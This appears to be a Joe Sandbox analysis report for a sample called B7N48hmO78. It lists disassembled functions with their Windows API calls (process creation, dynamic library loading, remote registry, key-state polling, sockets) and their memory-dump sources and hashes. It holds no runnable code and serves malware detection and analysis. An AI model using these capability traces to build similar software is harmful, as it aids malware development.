                                                                                                                    • Part of subcall function 00E1C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E1C84A
                                                                                                                    • Part of subcall function 00E1C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E1C85D
                                                                                                                    • Part of subcall function 00E1C82D: GetCurrentThreadId.KERNEL32 ref: 00E1C864
                                                                                                                    • Part of subcall function 00E1C82D: AttachThreadInput.USER32(00000000), ref: 00E1C86B
                                                                                                                  • GetFocus.USER32 ref: 00E1CA05
                                                                                                                    • Part of subcall function 00E1C876: GetParent.USER32(?), ref: 00E1C884
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00E1CA4E
                                                                                                                  • EnumChildWindows.USER32(?,00E1CAC4), ref: 00E1CA76
                                                                                                                  • __swprintf.LIBCMT ref: 00E1CA90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                                                  • String ID: %s%d
                                                                                                                  • API String ID: 3187004680-1110647743
                                                                                                                  • Opcode ID: 52529dd375f14c8668e027263c4e60e216503723b03f7c71b1d02ee837982b29
                                                                                                                  • Instruction ID: 50183f01a31772f874587ba88217692a7e55ba6d761e9e562f88cde577d301a6
                                                                                                                  • Opcode Fuzzy Hash: 52529dd375f14c8668e027263c4e60e216503723b03f7c71b1d02ee837982b29
                                                                                                                  • Instruction Fuzzy Hash: CB11A2716402097BCF01BF619CC5FEE37A8AF54744F109066FA09BA082CBB09585CB71
                                                                                                                  Function 00E4E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E4E33D
                                                                                                                  • _memset.LIBCMT ref: 00E4E34C
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EA3D00,00EA3D44), ref: 00E4E37B
                                                                                                                  • CloseHandle.KERNEL32 ref: 00E4E38D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                  • String ID: D=
                                                                                                                  • API String ID: 3277943733-488882995
                                                                                                                  • Opcode ID: 4504703784b4bfcb9767639d6238d2d783e04f52d3d05d3a1dcb5fc7a2ecd8d5
                                                                                                                  • Instruction ID: 534809dd700fba54545b52d5670aebbb8fca24b4ff8f2d4152a148c71cb7f1f0
                                                                                                                  • Opcode Fuzzy Hash: 4504703784b4bfcb9767639d6238d2d783e04f52d3d05d3a1dcb5fc7a2ecd8d5
                                                                                                                  • Instruction Fuzzy Hash: 91F03AB1640304BEE2101B72AC46F77BE9CDB0AB54F015421FE0AFA1A2D375AE0486B9
                                                                                                                  Function 00E41945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E419F3
                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E41A26
                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E41B49
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00E41BBF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2364364464-0
                                                                                                                  • Opcode ID: bd9303344188a662a1544d91a9c90c5fe068632e10f1607419b0b3940cf605e7
                                                                                                                  • Instruction ID: 616ab14ceed76da38e966cda6ae0a6394a147ace11c359790d758163cd58115e
                                                                                                                  • Opcode Fuzzy Hash: bd9303344188a662a1544d91a9c90c5fe068632e10f1607419b0b3940cf605e7
                                                                                                                  • Instruction Fuzzy Hash: 42817174600204EBDF109F64D886BADBBE5EF44724F15C499FA05BF3C2D7B5A9418BA0
                                                                                                                  Function 00E4E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E4E1D5
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00E4E20D
                                                                                                                  • IsDlgButtonChecked.USER32(?,00000001), ref: 00E4E248
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00E4E269
                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E4E281
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188977179-0
                                                                                                                  • Opcode ID: ffaf9939cb0377c927e1b92b5fc5dbac94330f8f107055e47e9ce664afb501ae
                                                                                                                  • Instruction ID: dcb8da0e779b1609d85260adaaa3d8b8b724cdaa2b3a64377fe61cf82d354f12
                                                                                                                  • Opcode Fuzzy Hash: ffaf9939cb0377c927e1b92b5fc5dbac94330f8f107055e47e9ce664afb501ae
                                                                                                                  • Instruction Fuzzy Hash: 7D61AF34A45204AFDB24CF58D895FBA77BAFF8A304F045099F85AB73A1C7B1A940CB11
                                                                                                                  Function 00E40688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00E406EE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00E4077D
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E4079B
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00E407E1
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 00E407FB
                                                                                                                    • Part of subcall function 00DFE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00E2A574,?,?,00000000,00000008), ref: 00DFE675
                                                                                                                    • Part of subcall function 00DFE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00E2A574,?,?,00000000,00000008), ref: 00DFE699
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 327935632-0
                                                                                                                  • Opcode ID: 4491a9356d468d94b8a1094c0f57999a04b5bdc2ba544be2f4a6abb0db494ccc
                                                                                                                  • Instruction ID: 369ca639758bb1fe860c05d6a3d25417b9c4e25badd4e614d230949951c834a7
                                                                                                                  • Opcode Fuzzy Hash: 4491a9356d468d94b8a1094c0f57999a04b5bdc2ba544be2f4a6abb0db494ccc
                                                                                                                  • Instruction Fuzzy Hash: 08518A75A00249DFCB00EFA9D884DADB7B5FF49310B158066EA05AB352DB70ED46CFA1
                                                                                                                  Function 00E42E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E42BB5,?,?), ref: 00E43C1D
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E42EEF
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E42F2E
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E42F75
                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00E42FA1
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E42FAE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3740051246-0
                                                                                                                  • Opcode ID: 0488f4798eb7d6c6fc8e9838bc3dac0f8e658a78929422be7de013164ba00d9a
                                                                                                                  • Instruction ID: 7067e1d2e1e9066d65650b4e7951bfca621cc515a3a0c00a426289cbb9fc06e2
                                                                                                                  • Opcode Fuzzy Hash: 0488f4798eb7d6c6fc8e9838bc3dac0f8e658a78929422be7de013164ba00d9a
                                                                                                                  • Instruction Fuzzy Hash: 2D515971208244AFD704EF65DC81E6AB7F9FF88314F80981DF695A7291DB70E909CB62
                                                                                                                  Function 00E38DE2 Relevance: 7.6, APIs: 5, Instructions: 136networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00E38E7C
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E38E89
                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00E38EAD
                                                                                                                  • _strlen.LIBCMT ref: 00E38EF7
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E38F6A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_strlenselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2217125717-0
                                                                                                                  • Opcode ID: 192f011d359447ef28dbf488ee353a504dfdca88f99c12eea2930f2f24097155
                                                                                                                  • Instruction ID: 1e1e8cf0cc17be0164a70e1ad31f4100c9b1af3bcdcd8f967b80ba7a9c5fe622
                                                                                                                  • Opcode Fuzzy Hash: 192f011d359447ef28dbf488ee353a504dfdca88f99c12eea2930f2f24097155
                                                                                                                  • Instruction Fuzzy Hash: B441C371600208AFCB14EB65DE89EEEBBBAEF58314F105159F116A7291DF70AE40CB70
                                                                                                                  Function 00E4CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e353084d950762bfc260aa7bd2c99782de63abd9e9c0b7d85f2e1af36fdeaac6
                                                                                                                  • Instruction ID: e6254badbf19002e5d2964ad95831ada8d3d707f40616573e2000a136203f4dc
                                                                                                                  • Opcode Fuzzy Hash: e353084d950762bfc260aa7bd2c99782de63abd9e9c0b7d85f2e1af36fdeaac6
                                                                                                                  • Instruction Fuzzy Hash: 9D41D339E02104AFC760DF68EC44FEABB68EB4D354F242165E91AB72E1C770AD01DA50
                                                                                                                  Function 00E31206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E312B4
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E312DD
                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E3131C
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E31341
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E31349
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1389676194-0
                                                                                                                  • Opcode ID: 8d93bdaede993894ac5c2d052c583715218a637a3ca430464f902eb33ad8e015
                                                                                                                  • Instruction ID: acbe92a6020bb1d24fe25c88ec1ebe36f9c3d50471aef47671de11c0ef8b071d
                                                                                                                  • Opcode Fuzzy Hash: 8d93bdaede993894ac5c2d052c583715218a637a3ca430464f902eb33ad8e015
                                                                                                                  • Instruction Fuzzy Hash: BC411D35A00145DFCF01EF65C995AAEBBF5FF08314B158099E90AAB3A2CB31ED15DB60
                                                                                                                  Function 00DFB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(000000FF), ref: 00DFB64F
                                                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 00DFB66C
                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00DFB691
                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00DFB69F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4210589936-0
                                                                                                                  • Opcode ID: 615f90d57bf698af3f0d2676511a142f40d1b026ff0130b8359ff1704887f76b
                                                                                                                  • Instruction ID: 4b09df0087d9bc92be2dc6c713ddc8f5c12d92f4bedf4fe91febc952e1cfc4cd
                                                                                                                  • Opcode Fuzzy Hash: 615f90d57bf698af3f0d2676511a142f40d1b026ff0130b8359ff1704887f76b
                                                                                                                  • Instruction Fuzzy Hash: E2416031608119FFDF159F65CC44AEDBBB4FB05365F10831AF829A6290CB30A994DFA1
                                                                                                                  Function 00E1B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00E1B369
                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00E1B413
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E1B41B
                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00E1B429
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E1B431
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3382505437-0
                                                                                                                  • Opcode ID: b9ca2dc5a1a9ffe51e03fbf406f0e174627485f33f5ffe73153550e734ce10ac
                                                                                                                  • Instruction ID: a1206e0b57fa57ca1012d587e87f4dc6b852720fee01f567a3dc17bbc8ad001f
                                                                                                                  • Opcode Fuzzy Hash: b9ca2dc5a1a9ffe51e03fbf406f0e174627485f33f5ffe73153550e734ce10ac
                                                                                                                  • Instruction Fuzzy Hash: A5319C71904219EFDB14CF69DD49ADE7BB5EB04329F108229F921AA1D1C3F099A4CB91
                                                                                                                  Function 00E1DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00E1DBD7
                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E1DBF4
                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E1DC2C
                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E1DC52
                                                                                                                  • _wcsstr.LIBCMT ref: 00E1DC5C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3902887630-0
                                                                                                                  • Opcode ID: 25474bb703a01ba58ddaa5f1dc6548ac6265e2a41f16a4853cac9387da726c4d
                                                                                                                  • Instruction ID: 7d9658468c7fbc31b1254e8f136c0c24622f8cde1a4c6221966c35effb8da985
                                                                                                                  • Opcode Fuzzy Hash: 25474bb703a01ba58ddaa5f1dc6548ac6265e2a41f16a4853cac9387da726c4d
                                                                                                                  • Instruction Fuzzy Hash: 6F21077160C104BBEB155B39DC49EBFBBA8DF45764F118029F90AEA191EAA1DC81D2A0
